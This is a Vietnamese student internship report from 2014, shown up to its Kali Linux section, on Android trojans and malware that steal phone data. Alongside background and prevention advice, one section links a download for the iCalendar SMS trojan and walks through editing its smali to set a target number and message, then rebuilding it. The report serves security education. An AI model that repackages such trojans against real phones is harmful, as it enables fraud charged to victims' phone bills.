thực tập

64
1 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086 ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN KHOA ĐIỆN TỬ VIỄN THÔNG TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THC TP Đề tài: Nghiên cứu các Trojan, Malware cho phép đánh cắp dliệu như danh sách contact, tin nhắn trên điên thoi sdng Android và gi ra ngoài GVHD: Thầy Võ Đỗ Thng SVTH: Nguyễn Hoàng Đức Lâm MSSV: 1120086 TPHCM, ngày tháng năm 2014

Upload: canh-dong-hoa-gio

Post on 21-Jul-2015

97 views

Category:

Engineering


4 download

TRANSCRIPT

Page 1: Thực tập

1 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH

TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN

KHOA ĐIỆN TỬ VIỄN THÔNG

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN

NINH MẠNG QUỐC TẾ ATHENA

BÁO CÁO THỰC TẬP

Đề tài: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điên

thoại sử dụng Android và gửi ra ngoài

GVHD: Thầy Võ Đỗ Thắng

SVTH: Nguyễn Hoàng Đức Lâm

MSSV: 1120086

TPHCM, ngày tháng năm 2014

Page 2: Thực tập

2 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG

Tôi xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên và Khoa Điện Tử

Viễn thông đã tạo điều kiện cho tôi hoàn thành tốt đợt thực tập này. Trong đợt thực tập này

đã cho tôi những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp tôi hoàn thiện hơn

trong công việc và môi trường làm việc sau này.

Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của bản thân.

Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh

khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng góp, chia sẻ để tôi có thể

làm tốt hơn nữa.

Một lần nữa tôi xin chân thành cảm ơn.

TPHCM, ngày tháng năm 2014

Sinh viên thực tập

Nguyễn Hoàng Đức Lâm

Page 3: Thực tập

3 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

NHẬN XÉT CỦA KHOA

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Trưởng Khoa

Page 4: Thực tập

4 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

LỜI CẢM ƠN TRUNG TÂM ATHENA

Tôi xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế Athena, cùng

các anh chị trong công ty. Đặc biệt, tôi xin chân thành cảm ơn thầy Đỗ Võ Thắng đã nhiệt

tình giúp đỡ và hướng dẫn tôi trong suốt thời gian thực tập tại trung tâm. Thầy đã tạo mọi

điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết cũng như đóng góp những ý kiến

quý báu để hoàn thành tốt bài báo cáo này.

Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của bản thân.

Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh

khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng góp, chia sẻ để tôi có thể

làm tốt hơn nữa.

Một lần nữa tôi xin chân thành cảm ơn.

TPHCM, ngày tháng năm 2014

Chú thích: Hình Giáo viên hướng dẫn (Th.Võ Đỗ Thắng) với sinh viên thực tập (Nguyễn Hoàng Đức Lâm)

Page 5: Thực tập

5 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN TẠI

TRUNG TÂM

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

................................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Giảng Viên Hướng Dẫn

Page 6: Thực tập

6 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

LỜI CAM ĐOAN

Tôi xin cam đoan:

Những nội dung trong báo cáo này là do tôi thực hiện dưới sự hướng dẫn trực

tiếp của thầy Võ Đỗ Thắng.

Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả,

tên công trình, thời gian, địa điểm công bố.

Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, tôi xin

chịu hoàn toàn trách nhiệm.

TPHCM, ngày tháng năm 2014

Sinh viên thực tập

Nguyễn Hoàng Đức Lâm

Page 7: Thực tập

7 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

LỜI MỞ ĐẦU

Trong những năm gần đây, vấn đề “An toàn và bảo mật thông tin” đang ngày càng

nóng. Với sự phát triển đến chóng mặt của các nền tảng do động như iOS, Android,

Windows Phone cùng với nhiều dòng điện thoại thông minh, vấn đề bảo, mật thông tin

chuyển dần xu hướng từ PC sang mobile đặc biệt là Smartphone. Nếu bạn đang sở hữu một

chiếc Smartphone của Apple, Google Nexus, Samsung, Nokia, HTC, Sony,…liệu bạn có

dám chắc chắn là “dế cưng” của mình không bị nhiễm các phần mềm gián điệp, nghe lén

không?. Vì sao lại như vậy?. Vì theo báo cáo gần đây của các hãng phần mềm bảo mật như

Kaspersky Lab, Norton AV, Avast hay BKAV số lượng Smartphone bị nhiễm mã độc ngày

càng tang. Đặc biệt hệ điều hành Android là một hệ điều hành phát triển khá nhanh trong

những năm gần đây, là một mảnh đất béo bở cho các Hacker tấn công. Với sự nhẹ dạ cả

tin, thiêu hiểu biết của người dùng, long tham các thứ “Free” như free app, free wifi đã vô

tình tiếp tay cho các Hacker xâm nhập và cài mã độc trên chính chiếc điện thoại của bạn.

Đề tài “Ngiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách

contact, tin nhắn trên điện thoại Android và gửi ra ngoài” sẽ giúp giúp nghiên cứu tìm hiểu

cách thức hoạt động, chia sẻ thông tin cũng như cung cấp các giải pháp để phòng tránh.

Page 8: Thực tập

8 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

MỤC LỤC

LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG ..................................................... 2

NHẬN XÉT CỦA KHOA ............................................................................................... 3

LỜI CẢM ƠN TRUNG TÂM ATHENA .................................................................... 4

NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN TẠI TRUNG TÂM................. 5

LỜI CAM ĐOAN ............................................................................................................. 6

LỜI MỞ ĐẦU.................................................................................................................... 7

MỤC LỤC .......................................................................................................................... 8

A. GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP .............................................. 9

B. THỰC HÀNH................................................................................................... 11

I. Giới thiệu về Hệ Điều Hành Android......................................................................... 11

II. Giới thiệu Trojan và sử dụng Trojan tấn công máy android .................................. 13

III.Giới thiệu Malware và sử dụng Malware tấn công máy android.........................19

Phân 1: Làm trên mạng Local Lan.................................................................39

Phần 2: Làm trên môi trường VPS ................................................................46

C. KẾT QUẢ ĐẠT ĐƯỢC................................................................................. 62

D. DANH SÁCH CÁC CLIP........................................................................63

E. TRÍCH DẪN NGUỒN THAM KHẢO....................................................64

Page 9: Thực tập

9 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

A GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP

Cơ sở 1_Tại TP Hồ Chí Minh:

- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.

Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.

Điện thoại: ( 84-8 ) 3824 4041 Hotline: 0943 23 00 99

Cơ sở 2_Tại TP Hồ Chí Minh:

- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA

92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.

Website: www.athena.edu.vn or www.athena.com.vn

Điện thoại: (84-8) 2210 3801

Hotline: 0943 20 00 88

- Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được

thành lập từ năm 2004, là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng

động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp

phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế

mũi nhọn, góp phần phát triển nước nhà.

- Lĩnh vực hoạt động: Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản

trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các

hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH... Song song đó,

trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng t heo

đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh

nghiệp, các cơ quan chính phủ, tổ chức tài chính…

Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là

chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho

nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An,

Page 10: Thực tập

10 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…

Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp

tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố

Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn

Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự…

Đội ngũ giảng viên:

Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học

hàng đầu trong nước.... Tất cả giảng viên ATHENA đều phải có các chứng chỉ

quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm

Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc

để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA.

Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức

công nghệ mới từ các nước tiên tiến như Mỹ, Pháp, Hà Lan, Singapore và truyền

đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA.

Page 11: Thực tập

11 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

B.Thực hành

I. Giới thiệu về Hệ Điều Hành Android

Lịch sử

Tổng công ty Android (Android, Inc.) được thành lập tại

Palo Alto, California vào tháng 10 năm 2003 bởi Andy

Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng

sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó giám đốc T-Mobile), và Chris White (trưởng

thiết kế và giao diện tại WebTV) để phát triển, theo lời của

Rubin, "các thiết bị di động thông minh hơn có thể biết

được vị trí và sở thích của người dùng". Dù những người

thành lập và nhân viên đều là những người có tiếng tăm,

Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ đang làm phần mềm

dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí. Steve Perlman, một người bạn

thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng từ chối tham gia vào công ty.

Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó thành một

bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty Android, gồm

Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ này. Vào thời điểm

đó không có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn đoán rằng Google dự

tính tham gia thị trường điện thoại di động sau bước đi này. Tại Google, nhóm do Rubin đứng

đầu đã phát triển một nền tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá

nền tảng này cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ

thống uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần cứng

cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ

khác nhau.

Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất

hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google

muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ

lực làm việc để thực hiện điều này. Các phương tiện truyền thông truyền thống lẫn online cũng

viết về tin đồn rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Một

vài tờ báo còn nói rằng trong khi Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết,

họ đã trình diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng. Tháng 9 năm 2007, InformationWeek đăng tải một nghiên cứu của Evalueserve cho biết Google đã nộp

một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại di động.

Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một hiệp hội

bao gồm nhiều công ty trong đó có Texas Instruments,Tập đoàn Broadcom, Google, HTC,

Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile được thành lập với mục đích phát triển các tiêu chuẩn mở cho thiết

Page 12: Thực tập

12 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

bị di động. Cùng ngày, Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên

minh, một nền tảng thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện

thoại chạy Android đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 10 năm 2008.

Biểu tượng của hệ điều hành Android mới là một con rôbốt màu xanh lá cây do hãng thiết kế

Irina Blok tại California vẽ.

Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều hành, bổ

sung các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản nâng cấp được

đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng miệng; ví dụ như phiên

bản 1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên bản 1.6 Donut (bánh vòng).

Phiên bản mới nhất (chính thức) là 4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra mắt

loạt thiết bị Nexus - một dòng sản phẩm bao gồm điện thoại thông minh và máy tính bảng chạy

hệ điều hành Android, do các đối tác phần cứng sản xuất. HTC đã hợp tác với Google trong

chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính bảng Nexus 10, lần lượt do

LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng Nexus là những thiết bị

Android chủ lực của mình, với những tính năng phần cứng và phần mềm mới nhất của Android.

Đặc điểm

1. Tính mở. Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có.

Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng lõi của điện

thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép người phát triển

tạo phong phú hơn, liên kết hơn các tính năng cho người dùng. Android được xây

dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa

bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có

thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp

tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo

2. Tính ngang bằng của các ứng dụng. Với Android, không có sự khác nhau giữa các

ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây dựng để

truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại. Với các thiết

bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các nhu

cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng

dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình

thích. 3. Phá vỡ rào cản phát triển ứng dụng. Android phá vỡ rào cản để tạo ứng dụng mới và

cải tiến. Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên

điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp

chính xác hơn cho người khác. Với Android, người phát triển có thể xây dựng một

ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi

họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của

MapView và dịch vụ định vị toàn cầu GPS.

4. Xây dựng ứng dụng dễ dàng và nhanh chóng. Android cung cấp bộ thư viện giao diện

lập trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức tạp. Ví dụ, Android

Page 13: Thực tập

13 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

có thể cho phép người phát triển biết được vị trí của thiết bị và cho phép các thiết bị

giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm

nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ

dàng.

II. Giới thiệu Trojan và sử dụng Trojan tấn công máy

android. 1. Giới Thiệu

Trojan - một chương trình dạng virus, một kẻ làm nội gián trong

máy tính của bạn đã giúp cho hacker điều khiển máy tính của

bạn, Trojan giúp hacker lấy những thông tin quý báu của bạn,

thậm chí hắn có thể xóa hoặc định dạng lại cả ổ cứng của bạn

nữa. Trojan có thể nhiễm vào máy của bạn qua tập tin gắn kèm

thư điện tử mà bạn đã vô tình tải về và chạy thử, hoặc có lẫn

trong những chương trình trò chơi, những chương trình mà bạn

không rõ nguồn gốc... Ðể "moi ruột" được mật khẩu của các chủ

thuê bao, hacker nội thường sử dụng virus có họ Trojan gửi đến

các thuê bao cần tấn công thông qua thư điện tử (e-mail) dưới

dạng dữ liệu đính kèm (File Attachment). Chỉ cần khi các chủ thuê bao vô tình mở file này,

lập tức Trojan được kích động và tự động sao chép lại tất cả các thông số về mật khẩu của

chủ thuê bao. Không chỉ là mật khẩu truy cập Intemet mà ngay cả đến mật khẩu của hòm

thư điện tử cũng dễ dàng bị đánh cắp. Ngay sau khi chủ thuê bao kết nối Internet, Trojan

sẽ bí mật sinh ra một e- mail và gửi mật khẩu đánh cắp về cho "tin tặc". Và sau đó mỗi lần

thay đổi mật khẩu virus Trojan sẽ tiếp tục lặng lẽ "tuồn" của ăn cắp tới một địa chỉ mà

hacker nội đã định sẵn.

Ðể đánh lừa "nạn nhân", "tin tặc" luôn tìm cách giăng ra những loại bẫy hết sức tinh

vi. Tinh vi đến nỗi không ít chủ thuê bao dù rất 'kỹ tính" nhưng vẫn cứ "sập" bẫy như

thường. Phổ biến nhất là hacker nội đội lốt những tổ chức hay công ty có uy tín để đánh

lừa chủ thuê bao bằng chương trình phần mềm thư ma Ghostmail. "tin tặc" dễ dàng thảo ra

những e-mail mạo danh với nội dung: "Hiện giờ tình trạng đánh cắp mật khẩu thuê bao

đang rất phổ biến, nhằm để phòng tránh, chúng tôi xin được gửi tới quý khách chương trình

phần mềm Tr-Protect (Vi rút Trojan sau khi đã đổi tên)". Có khi chúng lại "đội lốt" chuyên

gia lập trình chương trình diệt virus số 1 Việt Nam Nguyễn Tử Quảng: "Ðể phòng chống

virus Chernobyl 26- 4, chúng tôi hân hạnh gởi tới quý ngài chương trình BKAV 383. Mong

quý vị dùng thử Mọi ý kiến đóng góp xin gửi về địa chỉ sau [email protected]". Khi

Page 14: Thực tập

14 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

nhận được những tin kiểu như vậy, có không ít thuê bao dễ dàng "cắn câu" và cứ "tự nhiên"

cho chạy chương trình vi rút Trojan mà không hề nhận thức được rằng họ đang "tự nguyện"

hiến mình thành nạn nhân của bọn "tin tặc".

Như vậy, khi Trojan được kích hoạt trên máy của bạn và khi bạn truy cập Internet thì

Trojan có thể lấy mật khẩu truy cập mạng, lấy danh sách thư điện tử và thậm chí cả cấu

hình máy tính của bạn để gửi cho một địa chỉ thư điện tử của tên tin tặc. Nhưng nguy hiểm

hơn, Trojan còn gửi cả địa chỉ mạng IP, là địa chỉ mà nhà cung cấp dịch vụ mạng (ISP) gán

cho bạn lúc truy cập; tên tin tặc sẽ sử dụng địa chỉ IP của bạn để thiết lập kết nối từ máy

tính của hắn tới máy tính của bạn qua mạng Internet. Trojan sẽ lấy thông tin, xóa thông

tin...

Các thủ đoạn của Hacker

1. Giả danh nhà cung cấp dịch vụ: Hacker lấy danh nghĩa nhà cung cấp dịch vụ

Internet (ISP) gọi điện thoại hoặc gởi e-mail yêu cầu bạn cung cấp password hoặc đổi

password theo họ gợi ý. Hacker mail cho bạn một Attached File (tập tin .exe) cho biết là

file hỗ trợ sử dụng Internet nhưng thực chất đây là file ăn cắp password.

2. Lợi dụng sự tin tưởng khi mượn hoặc sửa chữa máy tính của bạn họ sẽ dễ dàng lấy

mật khẩu vì đa số người sử dụng đều thường xuyên Save Password vào máy.

3. Cài "gián điệp" vào máy tính của bạn: Ðây là phương thức cổ điển nhưng lại là

cách ăn cắp password thông dụng và hiệu quả nhất mà không tốn công sức, thường là file

Horse Trojan được gởi qua e-mail với những lời mời chào hết sức hấp dẫn, kích thích tò

mò. Nếu bạn mở file này thì ngay lập tức máy bạn đã bị nhiễm virus và từ đó trở đi,

password của bạn được thường xuyên gởi về cho Hacker ngay cả khi bạn thay password

mới.

Ðề phòng, tìm và diệt Trojan?

Ðể đề phòng bị nhiễm Trojan và các loại virus, bạn cần thận trọng khi tải các tập tin

trên mạng.

Ðể tìm và diệt Trojan, bạn cần tiến hành theo các bước sau:

1. Không nên tải và chạy thử những tập tin gắn kèm thư điện tử gửi cho bạn từ những

địa chỉ thư điện tử mà bạn không rõ. Cũng vì lý do này mà tác giả của chương

trình diệt vi rút thông dụng BKAV đã cảnh báo có nhiều kẻ mạo danh gửi cho bạn

chương trình diệt virus mà thực chất là Trojan.

Page 15: Thực tập

15 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

2. Sử dụng chương trình phát hiện và diệt Trojan, bạn có thể tìm kiếm trên mạng

Internet với từ khóa "Detect and destroy Trojan".

Nếu bạn không có sẵn trong tay những chương trình phát hiện và diệt Trojan thì bạn

có thể kiểm tra Registry của Window: HKEY – LOCAL – MACHINE \ Software \

Microsoft \ Windows \ Current Version \ Run. Nếu thấy có đường dẫn tới một

chương trình mà bạn biết là không phải của Window hoặc của các chương trình tiện

ích, bạn hãy thoát Window về chế độ DOS và xóa tập tin theo đường dẫn của

Registry, vào lại Window và xóa dòng đã ghi trong Registry. Bạn cũng có thể kiểm

tra cả tập tin Win.ini, System.ini trong thư mục C:\Windows sau mục Run hoặc

Load.

2. Hướng dẫn thực hiện Trojan iCalendar trên Android

iCalendar là một phần mềm được tích hợp mã độc có xuất xứ từ Trung Quốc, người

dùng cài đặt chương trình sau khi chạy chương trình sẽ tự động gửi tin nhắn mà không hề

mong muốn. Bằng cách này, điện thoại của nạn nhân sẽ bị trừ tiền mà không rõ nguyên do.

Ta mở công cụ supperApk tool, trước đó ta mở 2 máy ảo trước, và công cụ sẽ

scan ra.

Sau đó ta vào Project New Project chọn đến file iCalendar.apk

Các bạn có thể tải iCalendar.apk search google hoặc từ trang

http://search.4shared-china.com/q/CCAD/1/icalendar%20apk?suggested

Page 16: Thực tập

16 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Sau khi upload xong dữ liệu thì bạn vào ViewView Smail Code để chỉnh sửa code

Tiếp tục vào đường dẫn /com/mj/iCalendar.apk

Chỉnh sửa code của 2 file iCalendar.smali và SmsReceiver.smali

Page 17: Thực tập

17 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

- File iCalendar.smali , sửa code ở line 252 (số điện thoại của máy ta muốn gửi tin

nhắn) và line 253 (là nội dung tin nhắn)

- File SmsReceiver.smali , ta sửa code ở line 41 thành số điện thoại mà máy mình

muốn gửi đến, giống như ở iCalendar.smali

Page 18: Thực tập

18 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Sau khi sửa code ta save lại, và Run > Build (nhấn F5): cho phép bắt đầu quá trình cài đặt

trojan iCalendar.apk vào 1 máy ảo Android và gửi tin nhắn tự động đến máy ảo Android

khác.Chỉ cần mở iCalendar lên và ấn vài lần (khoảng 7 lần) là đã có một tin nhắn được gửi đi

mà không mong muốn.

Page 19: Thực tập

19 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

III. Giới thiệu Malware (phần mềm độc hại) và sử dụng

Malware tấn công máy android.

1) Giới thiệu Malware: Malware (phần mềm ác tính) viết tắt của cụm từ

Malicious Sofware, là một phần mềm máy tính được

thiết kế với mục đích thâm nhập hoặc gây hỏng hóc

máy tính mà người sử dụng không hề hay biết.

Theo thống kê của các hãng bảo mật trên thế giới thì

hiện các Malware hiện nay mới chỉ dừng lại ở mức độ

xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan. Theo các kết

quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như một phần

mềm gián điệp (Trojan) hơn là một virus phá hủy.

Cơ chế hoạt động của Malware

Malware này hoạt động qua hai giai đoạn:

- Giai đoạn đầu: Malware được nhúng vào trong một ứng dụng và sẽ chiếm được

quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu

tiên.

- Giai đoạn 2: Malware tự động cài đặt một ứng dụng thứ 2 với một permission đặc

biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các

thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Việc

cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các

ứng dụng mà không được phép.

Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc

lây nhiễm. Ở giai đoạn thứ hai ứng dụng tự động làm một số việc như là confirm, check-

in. Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào (hầu hết vào khoảng

thời gian từ 11h đêm tới 8h sáng ngày hôm sau). Đây là khoảng thời gian mà điện thoại ít

có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc

phát hiện một hành vi bất thường trên chiếc smartphone của mình.

Mục đích của Malware

Mục đích của Malware mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người

dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể về sau đã

Page 20: Thực tập

20 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được

tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng,

việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người

dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra

các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS

gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi

tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này.

Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn

đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị theo dõi, vì

vậy những mối nguy hiểm từ mã độc trên Android đang thực sự đe dọa đến sự an toàn của

người dùng hệ điều hành này.

2) Giới thiệu hệ điều hành KaLi Linux

Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra

bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là

BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử

dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công

bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản BackTrack

6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên

gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.

Page 21: Thực tập

